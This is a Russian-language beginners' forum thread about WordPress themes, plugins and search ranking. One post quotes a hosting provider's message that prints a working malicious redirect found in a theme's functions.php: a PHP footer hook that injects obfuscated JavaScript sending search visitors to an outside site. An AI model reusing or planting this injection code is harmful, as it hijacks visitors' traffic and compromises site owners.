Возьмемся за руки...

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Возьмемся за руки... » Первые шаги по созданию сайта » Наши первые ошибки <

Наши первые ошибки <

Сообщений 31 страница 43 из 43

31

Юрий написал(а):

Татьяна, попробуйте плагин   User Meta, там можно ввести в настройках столько полей, сколько сочтёте нужным.

о каких полях идет речь? не была на форуме. теперь не могу найти вопрос. который был задан. А вдруг и мне пригодится?)

0

32

egorytch написал(а):

Мила,кратенькая инструкция по смене темы.Заходим в админ-панель сайта и во вкладке внешний вид кликаем по "темы".ВВерху кликаем установить темы ,загрузить,выберите файл.В открывшемся окне выбираем ранее ранее скачаную тему,и далее установить.Затем просто активировать.

Спасибо большое, а остальные вопросы? Что я потеряю, если сменю тему?

0

33

Mila написал(а):

Что я потеряю, если сменю тему?

Ничего Вы не потеряете, кроме того, что смените тему.

0

34

Nikolay написал(а):

Вот ответ человека,который недавно занимался тем же самым.С темами можно сделать многое,но об этом я расскажу,когда накоплю достаточно материала.

0

35

Моему сайту всего месяц, моим знаниям о сайтах столько же. На сайте появился вирус. Dr.Web показал J.S.Redirector.112. Что это такое? Откуда он? И что теперь делать?
Подскажите, пожалуйста!

0

36

Лилия написал(а):

J.S.Redirector.112

Лилия,по поводу этого вируса описание здесь.Однако при проверке утилитой http://sitecheck.sucuri.net вирусов не обнаружено. Я пошлю результат проверки почтой. Мой доктор Веб на ваш сайт не реагирует, при вирусе он обычно ругается.Есть вариант следующий- сбросьте мне на почту архив с вашей темой либо просто сообщите название темы,я проверю её на наличие этого вируса ,если есть попробую удалить и сброшу чистый архив с темой обратно.Пока можно переустановить другую тему на время.

0

37

Пётр, благодарю Вас!
Вирус был два дня. Я не знала что делать. Сегодня днём написала на хостинг. Ответ пришел в полночь.
Вот их ответ:
"Нам удалось найти вредоносный код (JS-Redirector) в файле functions.php шаблона Вашего сайта:

add_action('get_footer', 'add_sscounter');
   function add_sscounter(){
       echo '<!--scounter-->';
       if(function_exists('is_user_logged_in')){
           if(time()%2 == 0 && !is_user_logged_in()){
               echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

Мы удалили данный код, сейчас все должно быть корректно."

Письмо прочитала только сейчас. Всю ночь сижу и ищу про этот вирус. Сама бы я его не смогла удалить.

Пётр, подскажите, можно ли что-то установить на сайт, чтобы не было таких вирусов? Или ничего нельзя сделать?

0

38

Лилия,установите плагин AntiVirus.И периодически проверяйте утилитой  http://sitecheck.sucuri.net на наличие вредоносного кода. Еще один возможный вариант- у вас сохранен архив вашей темы.Держите его в специально выделенном месте.Если вдруг в теме на сайте появится вредоносный код,временно установите другую тему,удалите полностью ту,что содержит код,а затем загрузите и активируйте резервный архив. Это на случай,если сложно бороться с самим кодом.

0

39

Правда ли что после смены темы сайт выпадает из топа и его снова нужно оптимизировать? Неужели я должна выбрать тему раз и навсегда и никогда ее не менять...((( влияет ли смена темы сайта для поисковика?

0

40

Оксана написал(а):

Правда ли что после смены темы сайт выпадает из топа и его снова нужно оптимизировать? Неужели я должна выбрать тему раз и навсегда и никогда ее не менять...((( влияет ли смена темы сайта для поисковика?

Я менял тему несколько раз,и никаких проблем с этим не заметил.Индексируются и попадают в топ статьи по поисковым запросам,а тема-это всего лишь способ оформления.Для поисковиков важна посещаемость сайта и оптимизация по поисковым запросам.Первый раз встречаюсь с вопросом зависимости нахождения сайта в топе от темы.)))

0

41

Nikolay написал(а):

Простите, Николай, но это не так. Можно потерять. Все темы разные. У одних - одни функциональные настройки, а у других - другие. Прежде, чем менять тему, нажмите на "предварительный просмотр" и посмотрите, как будет отображаться уже имеющийся материал в новой теме.
Если сохраняются старые настройки, которые вас устраивают, то смело устанавливаем новую тему.

0

42

Оксана написал(а):

Нет, Оксана, смена темы не влияет на оптимизацию. Рекомендую полезный плагин WP-Optimize. Он все время будет виден в консоли администратора в колонке слева, где все настройки.
Надо просто нажать на этот плагин, отметить галочками все пункты и далее на кнопку PROCESS

Отредактировано Лариса (2012-06-08 19:58:06)

+1

43

Моему сайту уже год, но поисковик Яндекс ни в какую не желает почему-то его индексировать. Когда я написал в службу поддержки, мне ответили, чтобы я писал новые статьи для посетителей, после обновления индекса страницы попадут в поиск. Также они сказали, что другие детали не упоминают - скрытный поисковик какой-то.
Если раньше была проиндексирована главная, то теперь ни одной страницы в поиске нет, хотя в базе сто с лишним.
Может ли это быть от того, что будучи новичком, я размещал попап окна сервисов, чтобы зарабатывать на рекламе?
сайт, указанный в профиле.
Кстати, сейчас создал уже новый сайт: свой персональный блог, где я пишу про создание и продвижение блогов и статических сайтов, про бизнес в интернете и своё творчество.
denis-skripnik.ru

0

Вы здесь » Возьмемся за руки... » Первые шаги по созданию сайта » Наши первые ошибки <

Рейтинг форумов | Создать форум бесплатно